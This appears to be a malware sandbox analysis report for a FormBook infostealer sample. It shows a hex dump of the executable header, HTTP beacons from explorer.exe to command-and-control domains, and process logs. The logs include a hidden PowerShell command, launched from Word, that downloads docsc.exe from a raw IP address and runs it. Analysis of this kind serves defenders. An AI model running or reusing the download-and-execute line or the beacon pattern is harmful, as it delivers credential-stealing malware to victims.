                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3c eb aa f7 af
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELT`P @ @@|O@ HU#j;F_`0X Z@.text^ `.rsrc@@@.reloc@B `<


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              4 | 192.168.2.22 | 49167 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:00.035893917 CEST | 2039 | OUT | GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1
                                              Host: www.boostcoachingonline.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:00.276009083 CEST | 2039 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx/1.16.1
                                              Date: Wed, 12 May 2021 09:35:00 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Location: http://zoom.us/j/8574583197?pwd=R20vRUg0bGh1THUxUDZZQm9JVlRadz09
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              5 | 192.168.2.22 | 49168 | 202.210.8.86 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:05.872672081 CEST | 2040 | OUT | GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.thepocket-onlinelesson.xyz
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:06.193262100 CEST | 2040 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 12 May 2021 09:35:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Location: http://thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              6 | 192.168.2.22 | 49169 | 75.2.115.196 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:18.773674965 CEST | 2041 | OUT | GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.applewholesales.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:18.930278063 CEST | 2042 | IN | HTTP/1.1 403 Forbidden
                                              Date: Wed, 12 May 2021 09:35:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: close
                                              Server: nginx
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              7 | 192.168.2.22 | 49170 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:24.049107075 CEST | 2043 | OUT | GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1
                                              Host: www.southernbrushworks.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:24.188290119 CEST | 2043 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 12 May 2021 09:35:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "60995c0c-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              8 | 192.168.2.22 | 49171 | 107.155.89.74 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:29.433298111 CEST | 2044 | OUT | GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.betsysellsswfl.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:29.600893974 CEST | 2045 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 12 May 2021 09:35:29 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Location: https://betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV
                                              Content-Length: 427
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 74 73 79 73 65 6c 6c 73 73 77 66 6c 2e 63 6f 6d 2f 61 38 73 69 2f 3f 62 7a 72 44 3d 74 73 42 57 70 47 73 52 5a 6d 79 37 64 37 78 32 6e 68 6c 79 53 79 74 37 6b 55 4a 58 64 69 7a 63 74 4a 73 66 4e 72 74 58 46 45 76 34 6c 46 30 65 4f 71 63 79 71 62 66 30 6e 4a 49 79 59 34 72 6b 4b 56 78 42 45 51 3d 3d 26 61 6d 70 3b 79 78 6c 34 41 3d 49 4a 42 38 53 70 74 50 4f 56 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 65 74 73 79 73 65 6c 6c 73 73 77 66 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&amp;yxl4A=IJB8SptPOV">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.betsysellsswfl.com Port 80</address></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              9 | 192.168.2.22 | 49172 | 209.143.158.10 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:34.885409117 CEST | 2046 | OUT | GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1
                                              Host: www.ethereumdailypay.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:35.223258018 CEST | 2047 | IN | HTTP/1.1 200 OK
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Content-Type: text/html; Charset=utf-8
                                              Expires: Tue, 11 May 2021 09:35:34 GMT
                                              Server: Microsoft-IIS/8.5
                                              Set-Cookie: SITE=distributor%5FID=976489; expires=Thu, 12-May-2022 07:00:00 GMT; path=/; HttpOnly
                                              Set-Cookie: ASPSESSIONIDSQDCABCA=HKOKJNCBGOPBFIOCKFHJPAHG; path=/; HttpOnly; httpOnly
                                              X-Frame-Options: *
                                              Date: Wed, 12 May 2021 09:35:35 GMT
                                              Connection: close
                                              Content-Length: 4633
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 41 63 63 65 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 72 74 65 2f 64 31 37 31 38 37 39 2f 69 6d 61 67 65 73 2d 6c 65 61 64 6c 69 67 68 74 6e 69 6e 67 2f 73 74 79 6c 65 2d 6c 65 61 64 2d 6c 69 67 68 74 6e 69 6e 67 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 
68 65 65 74 22 20 2f 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 43 72 65 61 74 65 20 61 20 66 72 65 6e 7a 79 20 6f 66 20 72 65 64 20 68 6f 74 20 62 75 79 65 72 73 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 77 20 50 75 73 68 20 42 75 74 74 6f 6e 20 53 79 73 74 65 6d 20 46 6f 72 20 43 72 65 61 74 69 6e 67 20 52 65 64 20 48 6f 74 20 42 75 79 65 72 73 20 61 6e 64 20 46 72 65 73 68 20 4c 65 61 64 73 20 44 61 69 6c 79 2e 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="keywords" content="Free Access" /><link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css" /><link href="//fonts.googleapis.com/css?family=Lato:400,700,900" rel="stylesheet" type="text/css" /><link href="/imagesrte/d171879/images-leadlightning/style-lead-lightning.css" rel="stylesheet" /><meta content="Create a frenzy of red hot buyers." name="description" /><meta content="New Push Button System For Creating Red Hot Buyers and Fresh Leads Daily." property="og:title" /><meta content="website" property="og:


                                              Code Manipulations

                                              Statistics

                                              Behavior


                                              System Behavior

                                              General

                                              Start time:11:33:33
                                              Start date:12/05/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f5b0000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:33:40
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
                                              Imagebase:0x13f160000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2097570171.0000000000310000.00000004.00000020.sdmp, Author: Florian Roth
                                              Reputation:high

                                              General

                                              Start time:11:33:40
                                              Start date:12/05/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
                                              Imagebase:0x13feb0000
                                              File size:157024 bytes
                                              MD5 hash:AF5CCD95BAC7ADADD56DE185D7461B2C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:11:33:41
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
                                              Imagebase:0x13f160000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp, Author: Florian Roth
                                              Reputation:high

                                              General

                                              Start time:11:33:42
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
                                              Imagebase:0x13f160000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp, Author: Florian Roth
                                              Reputation:high

                                              General

                                              Start time:11:33:45
                                              Start date:12/05/2021
                                              Path:C:\Users\user\AppData\Roaming\docsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\docsc.exe'
                                              Imagebase:0xbd0000
                                              File size:973824 bytes
                                              MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2116660543.000000000238C000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:11:33:53
                                              Start date:12/05/2021
                                              Path:C:\Users\user\AppData\Roaming\docsc.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\docsc.exe
                                              Imagebase:0xbd0000
                                              File size:973824 bytes
                                              MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              General

                                              Start time:11:33:53
                                              Start date:12/05/2021
                                              Path:C:\Users\user\AppData\Roaming\docsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\docsc.exe
                                              Imagebase:0xbd0000
                                              File size:973824 bytes
                                              MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:11:33:56
                                              Start date:12/05/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0xffca0000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:34:06
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                              Imagebase:0xaa0000
                                              File size:279552 bytes
                                              MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
